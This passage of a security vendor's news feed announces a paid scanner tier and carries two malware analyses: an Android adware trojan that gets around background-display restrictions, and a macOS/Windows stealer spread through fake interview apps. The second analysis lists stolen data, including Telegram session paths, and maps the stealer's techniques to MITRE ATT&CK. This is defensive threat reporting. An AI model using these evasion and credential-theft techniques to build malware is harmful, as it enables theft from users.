avanzada</title><link>https://news.dr-web.es/show/?i=15268&amp;lng=es&amp;c=5</link><pubDate>Wed, 10 Jun 2026 09:50:40 GMT</pubDate><description>&lt;p&gt;&lt;newslead&gt;Hemos analizado los comentarios de nuestros usuarios y hemos llegado a una conclusión importante. En un momento crítico, cuando el ordenador está infectado, no se necesitan configuraciones complejas: se necesita una solución rápida, sencilla y segura que pueda iniciarse y desinfectar el sistema con un solo clic.&lt;/newslead&gt;&lt;/p&gt;&lt;p&gt;Por ello, hemos revisado los principios de funcionamiento de la utilidad. El clásico Dr.Web CureIt! gratuito sigue disponible, pero ahora está aún más enfocado en lo esencial: basta con descargarlo, pulsar «Escanear» y listo. Se trata de un escáner rápido y seguro para la desinfección de emergencia, capaz de neutralizar amenazas activas y desinfectar el sistema.&lt;/p&gt;&lt;p&gt;&lt;strong&gt;¿Y para quienes necesitan controlar el proceso?&lt;/strong&gt;&lt;/p&gt;&lt;p&gt;No hemos eliminado las funciones avanzadas. Al contrario, las hemos reunido en un producto independiente — Dr.Web CureIt! Pro, y lo hemos hecho más cómodo y accesible. Si necesita analizar un dispositivo extraíble, excluir carpetas del análisis o configurar la aplicación automática de acciones frente a las amenazas detectadas, dispondrá de un escáner flexible y completo por un coste mínimo.&lt;/p&gt;&lt;p&gt;&lt;strong&gt;¿Cómo funcionará?&lt;/strong&gt;&lt;/p&gt;&lt;ul&gt;&lt;li&gt;Gratis y sencillo: descargue la versión habitual de Dr.Web CureIt! e inicie al instante un escaneo rápido. Es una solución ideal para situaciones en las que cada minuto cuenta.&lt;/li&gt;&lt;li&gt;Si necesita más: en nuestro sitio web o directamente desde la versión gratuita podrá adquirir Dr.Web CureIt! Pro y acceder a todas las funciones de configuración avanzadas.&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;De este modo, le ofrecemos una solución para cada necesidad: simplicidad, de forma gratuita; máxima flexibilidad, por tan solo 5 euro por 5 días o 10 euro por 10 días.&lt;br&gt;El lanzamiento de Dr.Web CureIt! Pro está previsto para principios de julio. Una semana antes, ofreceremos a todos los usuarios acceso gratuito a todas las funciones de la versión Pro, para que puedan evaluarlas antes de tomar una decisión.&lt;br&gt;&amp;nbsp;&lt;/p&gt;</description></item><item><guid>https://news.dr-web.es/show/?i=15262&amp;lng=es</guid><title>El troyano Android.MagicAd muestra publicidad saltándose todas las restricciones</title><link>https://news.dr-web.es/show/?i=15262&amp;lng=es&amp;c=5</link><pubDate>Fri, 05 Jun 2026 01:00:00 GMT</pubDate><description>&lt;p&gt;&lt;newslead&gt;Los expertos del laboratorio antivirus de Doctor Web han detectado el programa troyano Android.MagicAd, que utiliza varios métodos para esquivar las restricciones del sistema operativo Android y mostrar publicidad mientras se ejecuta en segundo plano. Uno de estos métodos es universal, mientras que otros están diseñados para dispositivos de determinados fabricantes. Entre ellos se encuentran la explotación de aplicaciones de terceros, así como el uso del reproductor multimedia del sistema.&lt;/newslead&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://vms.dr-web.es/search/?q=Android.MagicAd.1&amp;lng=es"&gt;&lt;b&gt;Android.MagicAd.1&lt;/b&gt;&lt;/a&gt; se propagaba a través del catálogo oficial de aplicaciones GetApps para dispositivos Xiaomi y permanecía oculto en más de 50 juegos y programas diferentes. Estas aplicaciones aparecían en la tienda durante un breve periodo de tiempo&amp;nbsp;— por lo general, menos de un mes — y después desaparecían, siendo sustituidas por otras nuevas. Es posible que, de este modo, los ciberdelincuentes intentaran proteger &lt;a href="https://vms.dr-web.es/search/?q=Android.MagicAd.1&amp;lng=es"&gt;&lt;b&gt;Android.MagicAd.1&lt;/b&gt;&lt;/a&gt; de a una detección prematura, manteniendo al mismo tiempo su actividad: tras ser eliminados de la tienda, los programas troyanos continúan instalados en los dispositivos de los usuarios y pueden seguir llevando a cabo actividades maliciosas. Actualmente, ninguna de las aplicaciones identificadas por nosotros con &lt;a href="https://vms.dr-web.es/search/?q=Android.MagicAd.1&amp;lng=es"&gt;&lt;b&gt;Android.MagicAd.1&lt;/b&gt;&lt;/a&gt; está disponible para su descarga en el catálogo GetApps, y los desarrolladores que las distribuían han dejado de publicar nuevas aplicaciones con este troyano.&lt;/p&gt;

&lt;p&gt;La investigación realizada por los analistas de virus de Doctor Web ha demostrado que las primeras versiones de &lt;a href="https://vms.dr-web.es/search/?q=Android.MagicAd.1&amp;lng=es"&gt;&lt;b&gt;Android.MagicAd.1&lt;/b&gt;&lt;/a&gt; aparecieron en 2025 y, además del catálogo GetApps, también se detectaron en Samsung Galaxy Store.&lt;/p&gt;

&lt;div class="img img-two"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/may/android_magic_ad/01_Android.MagicAd_store_1.png" data-fancybox=""&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/may/android_magic_ad/01_Android.MagicAd_store_1.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/may/android_magic_ad/02_Android.MagicAd_store_2.png" data-fancybox=""&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/may/android_magic_ad/02_Android.MagicAd_store_2.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;i&gt;Unos ejemplos de juegos y aplicaciones del catálogo GetApps en los que se ocultaba Android.MagicAd.1. En el momento de la publicación de esta noticia, estas y otras variantes del troyano ya no estaban disponibles para su descarga&lt;/i&gt;&lt;/p&gt;

&lt;p&gt;Una parte de las funciones maliciosas de &lt;a href="https://vms.dr-web.es/search/?q=Android.MagicAd.1&amp;lng=es"&gt;&lt;b&gt;Android.MagicAd.1&lt;/b&gt;&lt;/a&gt; está en módulos dex ocultos dentro de bibliotecas nativas cifradas ubicadas en el directorio de recursos del troyano. Durante su ejecución, este descifra dichas bibliotecas, extrae de ellas sus componentes y los pone en funcionamiento.&lt;/p&gt;

&lt;p&gt;Antes de comenzar a mostrar publicidad, el troyano realiza una serie de comprobaciones para asegurarse de que su entorno es seguro. Por ejemplo, busca indicios de ejecución en un entorno virtual, verifica si su instalación se ha producido de forma orgánica, comprueba que la dirección IP del dispositivo infectado no figure en su lista negra, etc.&lt;/p&gt;

&lt;p&gt;Si &lt;a href="https://vms.dr-web.es/search/?q=Android.MagicAd.1&amp;lng=es"&gt;&lt;b&gt;Android.MagicAd.1&lt;/b&gt;&lt;/a&gt; no detecta actividad sospechosa, oculta su icono de la lista de aplicaciones del menú principal. A continuación, crea un canal de notificaciones a través del cual inicia varios servicios maliciosos persistentes necesarios para funcionar en segundo plano cuando la ventana de la aplicación maliciosa está cerrada. Después, mediante el programador de tareas, &lt;a href="https://vms.dr-web.es/search/?q=Android.MagicAd.1&amp;lng=es"&gt;&lt;b&gt;Android.MagicAd.1&lt;/b&gt;&lt;/a&gt; crea una tarea que reinicia periódicamente los servicios encargados de supervisar el funcionamiento del canal de notificaciones y, si es necesario, volver a activarlo. Además, en dispositivos con versiones relativamente antiguas del sistema operativo Android, el troyano activa una pantalla virtual para evitar que el sistema interrumpa el funcionamiento de uno de sus componentes.&lt;/p&gt;

&lt;p&gt;Para mostrar publicidad en segundo plano cuando su ventana está cerrada, &lt;a href="https://vms.dr-web.es/search/?q=Android.MagicAd.1&amp;lng=es"&gt;&lt;b&gt;Android.MagicAd.1&lt;/b&gt;&lt;/a&gt; utiliza varias técnicas, seleccionadas en función del fabricante del dispositivo infectado. Estas se implementan sin solicitar explícitamente el permiso del sistema &lt;span class="string"&gt;SYSTEM_ALERT_WINDOW&lt;/span&gt; que permite a una aplicación mostrarse por encima de otros programas.&lt;/p&gt;

&lt;p&gt;Independientemente del método utilizado, todos los banners publicitarios se cargan en forma de actividades semitransparentes (Translucent Activity), lo que permite al troyano mostrarlos por encima de las ventanas existentes.&lt;/p&gt;

&lt;div class="img img-two-v same-height"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/may/android_magic_ad/03_Android.MagicAd_banner1.png" data-fancybox=""&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/may/android_magic_ad/03_Android.MagicAd_banner1.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/may/android_magic_ad/04_Android.MagicAd_banner2.png" data-fancybox=""&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/may/android_magic_ad/04_Android.MagicAd_banner2.1.png" alt="#drweb"&gt;
    &lt;/a&gt;

    &lt;a href="https://st.drweb.com/static/new-www/news/2026/may/android_magic_ad/05_Android.MagicAd_banner3.png" data-fancybox=""&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/may/android_magic_ad/05_Android.MagicAd_banner3.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/may/android_magic_ad/06_Android.MagicAd_banner4.png" data-fancybox=""&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/may/android_magic_ad/06_Android.MagicAd_banner4.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;p class="text-center"&gt;&lt;i&gt;Unos ejemplos de la publicidad mostrada por Android.MagicAd.1&lt;/i&gt;&lt;/p&gt;

&lt;p&gt;Una de las técnicas se implementa mediante intenciones (Intent) dirigidas a otras aplicaciones. Esto permite al troyano esquivar las restricciones de las versiones modernas de Android, que impiden que las aplicaciones se inicien a sí mismas. Dependiendo del modelo del dispositivo infectado, mediante esta técnica &lt;a href="https://vms.dr-web.es/search/?q=Android.MagicAd.1&amp;lng=es"&gt;&lt;b&gt;Android.MagicAd.1&lt;/b&gt;&lt;/a&gt; muestra directamente los anuncios o bien «obliga» a las aplicaciones objetivo a mostrar banners publicitarios.&lt;/p&gt;

&lt;p&gt;En una de las variantes de este método, los objetivos del troyano son:&lt;/p&gt;
&lt;ul class="list"&gt;
    &lt;li&gt;
        el navegador Mi Browser en dispositivos Xiaomi;
    &lt;/li&gt;
    &lt;li&gt;
        un entorno gráfico Miui SystemUI en dispositivos Xiaomi;
    &lt;/li&gt;
    &lt;li&gt;
        el lanzador Amazon Fire TV Home Screen en dispositivos Amazon TV.
    &lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Todas ellas son aplicaciones del sistema en los dispositivos correspondientes, por lo que pueden procesar intenciones incluso cuando no han sido iniciadas directamente por el usuario. Mientras estas aplicaciones permanezcan activas y puedan recibir intenciones, &lt;a href="https://vms.dr-web.es/search/?q=Android.MagicAd.1&amp;lng=es"&gt;&lt;b&gt;Android.MagicAd.1&lt;/b&gt;&lt;/a&gt; puede utilizarlas para mostrar anuncios.&lt;/p&gt;

&lt;p&gt;Cabe destacar que, si Mi Browser está instalado en un dispositivo Xiaomi como aplicación no perteneciente al sistema, el troyano también puede utilizar este navegador para mostrar publicidad, siempre que su ventana permanezca abierta.&lt;/p&gt;

&lt;p&gt;Cuando &lt;a href="https://vms.dr-web.es/search/?q=Android.MagicAd.1&amp;lng=es"&gt;&lt;b&gt;Android.MagicAd.1&lt;/b&gt;&lt;/a&gt; detecta Mi Browser en un dispositivo compatible, envía a su componente DEX (detectado por Dr.Web como &lt;a href="https://vms.dr-web.es/search/?q=Android.MagicAd.1.origin&amp;lng=es"&gt;&lt;b&gt;Android.MagicAd.1.origin&lt;/b&gt;&lt;/a&gt;) una intención diferida para iniciar la publicidad. Este componente genera su propia intención a partir de ella y la transmite al navegador, que extrae la intención original y, de acuerdo con la misma, muestra la publicidad.&lt;/p&gt;

&lt;p&gt;La interacción con los otros dos programas es algo diferente, ya que se utilizan para activar el troyano desde el modo de ejecución en segundo plano. En primer lugar, &lt;a href="https://vms.dr-web.es/search/?q=Android.MagicAd.1&amp;lng=es"&gt;&lt;b&gt;Android.MagicAd.1&lt;/b&gt;&lt;/a&gt; envía al módulo &lt;a href="https://vms.dr-web.es/search/?q=Android.MagicAd.1.origin&amp;lng=es"&gt;&lt;b&gt;Android.MagicAd.1.origin&lt;/b&gt;&lt;/a&gt; una intención diferida para iniciar la publicidad, y este transmite a las aplicaciones objetivo una intención propia para activarse. Si se trata de Miui SystemUI, esta responde enviando su propia intención para iniciar el módulo. Si, por el contrario, la aplicación objetivo es Amazon Fire TV Home Screen, inicia el módulo directamente mediante el nombre de su paquete. Una vez que obtiene el control, el módulo &lt;a href="https://vms.dr-web.es/search/?q=Android.MagicAd.1.origin&amp;lng=es"&gt;&lt;b&gt;Android.MagicAd.1.origin&lt;/b&gt;&lt;/a&gt; muestra la publicidad que recibió en la intención diferida enviada por la aplicación maliciosa principal.&lt;/p&gt;

&lt;p&gt;Si el troyano no consigue mostrar la publicidad, intenta utilizar este método dos veces más. En caso de que siga sin éxito, trata de mostrar los anuncios directamente, sin recurrir ya a las intenciones diferidas ni a su módulo dex malicioso.&lt;/p&gt;

&lt;p&gt;Otra variante de este método es similar a la anterior y se utiliza para usar aplicaciones en dispositivos Vivo. La diferencia radica en que la publicidad se inicia mediante Android Binder, un componente del sistema que permite la comunicación entre procesos. En este caso, el troyano tiene como objetivo las siguientes aplicaciones del sistema:&lt;/p&gt;
&lt;ul class="list"&gt;
    &lt;li&gt;
        iManager,
    &lt;/li&gt;
    &lt;li&gt;
        Contactos,
    &lt;/li&gt;
    &lt;li&gt;
        Vivo Browser,
    &lt;/li&gt;
    &lt;li&gt;
        Baidu IME Customized.
    &lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;a href="https://vms.dr-web.es/search/?q=Android.MagicAd.1&amp;lng=es"&gt;&lt;b&gt;Android.MagicAd.1&lt;/b&gt;&lt;/a&gt; las inicia a través de Android Binder, enviándole intenciones convencionales mediante el contenedor de datos Parcel. Estas aplicaciones posteriormente activan el componente troyano &lt;a href="https://vms.dr-web.es/search/?q=Android.MagicAd.1.origin&amp;lng=es"&gt;&lt;b&gt;Android.MagicAd.1.origin&lt;/b&gt;&lt;/a&gt; que, tras salir del modo de ejecución en segundo plano, muestra la publicidad.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://vms.dr-web.es/search/?q=Android.MagicAd.1&amp;lng=es"&gt;&lt;b&gt;Android.MagicAd.1&lt;/b&gt;&lt;/a&gt; también incorpora varias técnicas adicionales para mostrar publicidad mientras se ejecuta en segundo plano, entre ellas el uso del reproductor multimedia. A diferencia de los métodos dirigidos a dispositivos específicos, esta técnica es universal y funciona en la mayoría de los modelos de distintos fabricantes. &lt;a href="https://vms.dr-web.es/search/?q=Android.MagicAd.1&amp;lng=es"&gt;&lt;b&gt;Android.MagicAd.1&lt;/b&gt;&lt;/a&gt; descifra un archivo de audio oculto en su código y lo guarda en su directorio de trabajo. A continuación, el malware inicia una instancia propia del reproductor multimedia del sistema, configura el volumen al mínimo y la vincula al sistema global de control multimedia de Android.&lt;/p&gt;

&lt;p&gt;Posteriormente, para mostrar la publicidad, &lt;a href="https://vms.dr-web.es/search/?q=Android.MagicAd.1&amp;lng=es"&gt;&lt;b&gt;Android.MagicAd.1&lt;/b&gt;&lt;/a&gt; instala un receptor de difusión que monitoriza las pulsaciones realizadas en dicho reproductor. Después, mediante un comando especial de ADB, el troyano simula acciones del usuario pulsando el botón de grabación del reproductor y cerrando inmediatamente su ventana. Al pulsar este botón, se activa el receptor multimedia del sistema, lo que permite a &lt;a href="https://vms.dr-web.es/search/?q=Android.MagicAd.1&amp;lng=es"&gt;&lt;b&gt;Android.MagicAd.1&lt;/b&gt;&lt;/a&gt; tomar el control y mostrar la publicidad.&lt;/p&gt;

&lt;p&gt;Dr.Web Security Space para dispositivos móviles detecta y elimina de forma segura todas las versiones conocidas del malware &lt;a href="https://vms.dr-web.es/search/?q=Android.MagicAd.1&amp;lng=es"&gt;&lt;b&gt;Android.MagicAd.1&lt;/b&gt;&lt;/a&gt;, por lo que nuestros usuarios están protegidos de esta amenaza.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://github.com/DoctorWebLtd/malware-iocs/blob/master/Android.MagicAd.1/README.adoc" target="_blank" rel="noopener"&gt;Indicadores de compromiso&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Más información sobre &lt;a href="https://vms.dr-web.es/search/?q=Android.MagicAd.1&amp;lng=es"&gt;&lt;b&gt;Android.MagicAd.1&lt;/b&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Más información sobre &lt;a href="https://vms.dr-web.es/search/?q=Android.MagicAd.1.origin&amp;lng=es"&gt;&lt;b&gt;Android.MagicAd.1.origin&lt;/b&gt;&lt;/a&gt;&lt;/p&gt;</description></item><item><guid>https://news.dr-web.es/show/?i=15253&amp;lng=es</guid><title>En vez de trabajo: datos y dinero robados. En aplicaciones falsas para entrevistas online se oculta un troyano ladrón que ataca a usuarios de macOS y Windows</title><link>https://news.dr-web.es/show/?i=15253&amp;lng=es&amp;c=5</link><pubDate>Wed, 27 May 2026 02:00:00 GMT</pubDate><description>&lt;p&gt;&lt;newslead&gt;&lt;strong&gt;Los expertos de Doctor Web advierten sobre la propagación del troyano JobStealer, que roba información confidencial de usuarios de ordenadores con macOS y Windows. Su principal objetivo es el robo de datos de monederos de criptomonedas. Bajo el pretexto de realizar entrevistas online, los estafadores atraen a posibles víctimas a sitios web maliciosos donde les ofrecen instalar una aplicación de videoconferencia. En realidad, ese software es el propio troyano JobStealer.&lt;/strong&gt;&lt;/newslead&gt;&lt;/p&gt;

&lt;p&gt;El ataque comienza cuando los delincuentes contactan con posibles víctimas y les ofrecen una determinada vacante. Invitan a los usuarios a realizar una entrevista y les proporcionan enlaces a sitios web de supuestas «plataformas» para reuniones online, supuestamente para conectarse a una videoconferencia. Estos sitios parecen profesionales, pero en realidad son fraudulentos. Desde ellos se descarga el malware JobStealer bajo la apariencia de un programa para conferencias online. Además, los ciberdelincuentes utilizan varios diseños para estos recursos web y cambian también el nombre del propio programa. Nuestros expertos han encontrado variantes con nombres como MeetLab, Juseo, Meetix, Carolla y otros. En algunos casos, los ciberdelincuentes utilizan nombres de servicios reales, como Webex.&lt;/p&gt;

&lt;div class="img img-two-v same-height"&gt;
&lt;a href="https://st.drweb.com/static/new-www/news/2026/may/mac_pws_jobstealer/01_JobStealer.png" data-fancybox=""&gt;
&lt;img src="https://st.drweb.com/static/new-www/news/2026/may/mac_pws_jobstealer/01_JobStealer.1.png" alt="#drweb"&gt; &lt;/a&gt;
&lt;a href="https://st.drweb.com/static/new-www/news/2026/may/mac_pws_jobstealer/02_JobStealer.png" data-fancybox=""&gt;
&lt;img src="https://st.drweb.com/static/new-www/news/2026/may/mac_pws_jobstealer/02_JobStealer.1.png" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;i&gt;Unos ejemplos de sitios web de falsos servicios de conferencias online desde los que se descarga JobStealer&lt;/i&gt;&lt;/p&gt;

&lt;p&gt;Para que los usuarios crean que las plataformas funcionan realmente, los estafadores crean canales correspondientes en Telegram y cuentas en redes sociales, por ejemplo en X.&lt;/p&gt;

&lt;div class="img img-two-v same-height"&gt;&lt;a href="https://st.drweb.com/static/new-www/news/2026/may/mac_pws_jobstealer/03_JobStealer.png" data-fancybox=""&gt;
&lt;img src="https://st.drweb.com/static/new-www/news/2026/may/mac_pws_jobstealer/03_JobStealer.1.png" alt="#drweb"&gt;&lt;/a&gt;
&lt;a href="https://st.drweb.com/static/new-www/news/2026/may/mac_pws_jobstealer/04_JobStealer.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.com/static/new-www/news/2026/may/mac_pws_jobstealer/04_JobStealer.1.png" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;i&gt;Para hacer pasar el troyano por software legítimo, los delincuentes imitan actividad en las redes sociales&lt;/i&gt;&lt;/p&gt;

&lt;p&gt;Para instalar el programa en dispositivos con macOS, a los visitantes de los sitios maliciosos se les ofrecen dos opciones:&lt;/p&gt;

&lt;ul class="list"&gt;
&lt;li&gt;copiar y ejecutar en el terminal el comando bash indicado en el sitio web;&lt;/li&gt;
&lt;li&gt;descargar un archivo de imagen de disco en formato &lt;span class="string"&gt;.dmg&lt;/span&gt; y ejecutarlo.&lt;/li&gt;
&lt;/ul&gt;

&lt;div class="img"&gt;&lt;a href="https://st.drweb.com/static/new-www/news/2026/may/mac_pws_jobstealer/05_JobStealer.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.com/static/new-www/news/2026/may/mac_pws_jobstealer/05_JobStealer.1.png" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;i&gt;El troyano JobStealer se descarga desde sitios maliciosos tanto en forma de contenedor dmg como mediante la ejecución de un comando bash en el terminal&lt;/i&gt;&lt;/p&gt;

&lt;p&gt;En el primer caso, al ejecutar el comando en el terminal, se descarga automáticamente de Internet y se ejecuta un script que descarga y lanza el archivo ejecutable de JobStealer (detectado como&amp;nbsp;&lt;a href="https://vms.dr-web.es/search/?q=Mac.PWS.JobStealer.1&amp;lng=es"&gt;&lt;b&gt;Mac.PWS.JobStealer.1&lt;/b&gt;&lt;/a&gt;).&lt;/p&gt;

&lt;p&gt;En el segundo caso, la imagen dmg ofrecida para descarga ya contiene los archivos mencionados anteriormente. Al montarla, muestra instrucciones para la «instalación» de la aplicación. En ellas se indica que el usuario debe abrir el terminal y arrastrar al mismo la secuencia de comandos incluida. En realidad, en vez de instalar el software de videoconferencia, el script ejecutará el archivo troyano.&lt;/p&gt;

&lt;div class="img"&gt;&lt;a href="https://st.drweb.com/static/new-www/news/2026/may/mac_pws_jobstealer/06_JobStealer.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.com/static/new-www/news/2026/may/mac_pws_jobstealer/06_JobStealer.1.png" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;
&lt;/div&gt;

&lt;p class="text-center"&gt;&lt;i&gt;Una imagen con instrucciones que se muestra al abrir el archivo de imagen con el troyano JobStealer&lt;/i&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://vms.dr-web.es/search/?q=Mac.PWS.JobStealer.1&amp;lng=es"&gt;&lt;b&gt;Mac.PWS.JobStealer.1&lt;/b&gt;&lt;/a&gt;&amp;nbsp;es un archivo ejecutable contenedor en formato Fat Mach-O y contiene código binario para varias arquitecturas de procesador a la vez: x64 y arm64. En función de la plataforma del ordenador infectado, al ejecutar el troyano se utiliza automáticamente el componente correspondiente al procesador de destino.&lt;/p&gt;

&lt;p&gt;Cabe señalar que existen varias versiones de&amp;nbsp;&lt;a href="https://vms.dr-web.es/search/?q=Mac.PWS.JobStealer.1&amp;lng=es"&gt;&lt;b&gt;Mac.PWS.JobStealer.1&lt;/b&gt;&lt;/a&gt;. Las variantes más antiguas del malware no eran compatibles con ordenadores Mac con arquitectura arm64. Además, carecían de ofuscación, que los creadores del malware comenzaron a añadir y reforzar conforme actualizaban el stealer.&lt;/p&gt;

&lt;p&gt;Tras ejecutarse, &lt;a href="https://vms.dr-web.es/search/?q=Mac.PWS.JobStealer.1&amp;lng=es"&gt;&lt;b&gt;Mac.PWS.JobStealer.1&lt;/b&gt;&lt;/a&gt;&amp;nbsp;muestra una ventana de phishing en la que informa de un supuesto error de funcionamiento. Para «solucionarlo», el malware solicita al usuario que introduzca la contraseña de su cuenta.&lt;/p&gt;

&lt;div class="img"&gt;&lt;a href="https://st.drweb.com/static/new-www/news/2026/may/mac_pws_jobstealer/07_JobStealer_app_error.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.com/static/new-www/news/2026/may/mac_pws_jobstealer/07_JobStealer_app_error.1.png" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;&lt;/div&gt;

&lt;p class="text-center"&gt;&lt;i&gt;Una ventana de phishing en la que se solicita la contraseña de la cuenta del usuario de Mac&lt;/i&gt;&lt;/p&gt;

&lt;p&gt;Posteriormente&amp;nbsp;&lt;a href="https://vms.dr-web.es/search/?q=Mac.PWS.JobStealer.1&amp;lng=es"&gt;&lt;b&gt;Mac.PWS.JobStealer.1&lt;/b&gt;&lt;/a&gt;&amp;nbsp;recaba los datos siguientes:&lt;/p&gt;

&lt;ul class="list"&gt;
&lt;li&gt;versión del sistema operativo y el identificador del ordenador;&lt;/li&gt;
&lt;li&gt;datos de unas 300 extensiones de navegador de monederos de criptomonedas instaladas en los navegadores objetivo basados en Chromium (Chrome, Opera, Brave, OperaGX, Vivaldi, Edge, Arc, CocCoc);&lt;/li&gt;
&lt;li&gt;archivos cookie de estos navegadores;&lt;/li&gt;
&lt;li&gt;contraseñas y datos de tarjetas bancarias guardados en las listas de autocompletado del navegador;&lt;/li&gt;
&lt;li&gt;archivos del messenger Telegram de los directorios &lt;span class="string"&gt;/Library/Application Support/Telegram Desktop/tdata&lt;/span&gt; y &lt;span class="string"&gt;/Documents/temp_data/Apps/Telegram&lt;/span&gt; donde se almacenan claves de sesión de autorización, archivos descargados, etc.;&lt;/li&gt;
&lt;li&gt;notas del usuario de la aplicación Notes nativa de macOS;&lt;/li&gt;
&lt;li&gt;presencia en el sistema de las aplicaciones de monederos de criptomonedas Ledger Live y Trezor Suite.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Estos datos se almacenan en un archivo ZIP y se cargan en el servidor C2.&lt;/p&gt;

&lt;p&gt;Los creadores de virus también han preparado una versión del troyano JobStealer para ordenadores con sistema operativo Windows. Su funcionalidad es similar a la de la versión para macOS. Además, en algunos sitios maliciosos que distribuyen el stealer existen secciones para descargar la aplicación para otros sistemas operativos populares. Sin embargo, por el momento nuestros analistas de virus no han detectado su distribución. Por ejemplo, el botón de descarga para Linux está inactivo o redirige a la versión del troyano para Windows. Y en las secciones de descarga para dispositivos con iOS y Android se indica que esas versiones están en desarrollo. No obstante, no se puede descartar que en el futuro los atacantes comiencen a distribuir variantes del troyano también para estas plataformas.&lt;/p&gt;

&lt;div class="img"&gt;&lt;a href="https://st.drweb.com/static/new-www/news/2026/may/mac_pws_jobstealer/08_JobStealer.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.com/static/new-www/news/2026/may/mac_pws_jobstealer/08_JobStealer.1.png" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;&lt;/div&gt;

&lt;p class="text-center"&gt;&lt;i&gt;Los sitios web maliciosos podrían distribuir potencialmente versiones del troyano JobStealer para Linux, iOS y Android&lt;/i&gt;&lt;/p&gt;

&lt;p&gt;Todas las modificaciones conocidas del malware JobStealer son detectadas y eliminadas de forma fiable por los productos antivirus Dr.Web Security Space para macOS y Windows, y no son de amenaza para nuestros usuarios. Los sitios fraudulentos que distribuyen el troyano han sido añadidos a la base de recursos no recomendados y peligrosos, y también son bloqueados por Dr.Web.
&lt;/p&gt;

&lt;h3&gt;MITRE ATT&amp;amp;CK®&lt;/h3&gt;

&lt;p&gt;Hemos analizado el malware JobStealer utilizando el framework MITRE&amp;nbsp;ATT&amp;amp;CK®, que consiste en una matriz con descripciones de las tácticas y técnicas empleadas por los ciberdelincuentes para atacar sistemas de información. Como resultado, se identificaron las siguientes técnicas clave:&lt;/p&gt;

&lt;div class="table-news-secondary"&gt;&lt;figure class="table"&gt;&lt;table&gt;&lt;thead&gt;&lt;tr&gt;&lt;th&gt;&lt;strong&gt;Etapa&lt;/strong&gt;&lt;/th&gt;&lt;th&gt;&lt;strong&gt;Técnica&lt;/strong&gt;&lt;/th&gt;&lt;/tr&gt;&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;&lt;td&gt;Ejecución&lt;/td&gt;
&lt;td&gt;
&lt;p&gt;Ejecución con intervención del usuario (T1204)&lt;/p&gt;
&lt;p&gt;Copiado y pegado malicioso (T1204.004)&lt;/p&gt;
&lt;p&gt;Archivo malicioso (T1204.002)&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;Detección&lt;/td&gt;
&lt;td&gt;Detección de archivos y directorios (T1083)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;Recopilación de datos&lt;/td&gt;
&lt;td&gt;&lt;p&gt;Recopilación automatizada (T1119)&lt;/p&gt;
&lt;p&gt;Datos del sistema local (T1005)&lt;/p&gt;
&lt;p&gt;Credenciales de almacenes de contraseñas (T1555)&lt;/p&gt;
&lt;p&gt;Credenciales del llavero (T1555.001)&lt;/p&gt;
&lt;p&gt;Credenciales de navegadores (T1555.003)&lt;/p&gt;
&lt;p&gt;Captura de entradas del usuario (T1056)&lt;/p&gt;
&lt;p&gt;Captura de entradas en la interfaz gráfica de usuario (T1056.002)&lt;/p&gt;
&lt;p&gt;Archivado de los datos recopilados (T1560)&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;Mando y control&lt;/td&gt;
&lt;td&gt;Servicio web (T1102)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;Exfiltración de datos&lt;/td&gt;
&lt;td&gt;&lt;p&gt;Exfiltración automatizada (T1020)&lt;/p&gt;
&lt;p&gt;Exfiltración a través del canal de mando y control (T1041)&lt;/p&gt;
&lt;p&gt;Exfiltración mediante servicio web (T1567)&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/figure&gt;&lt;/div&gt;
&lt;p&gt;Más información sobre&amp;nbsp;&lt;a href="https://vms.dr-web.es/search/?q=Mac.PWS.JobStealer.1&amp;lng=es"&gt;&lt;b&gt;Mac.PWS.JobStealer.1&lt;/b&gt;&lt;/a&gt;&lt;/p&gt;
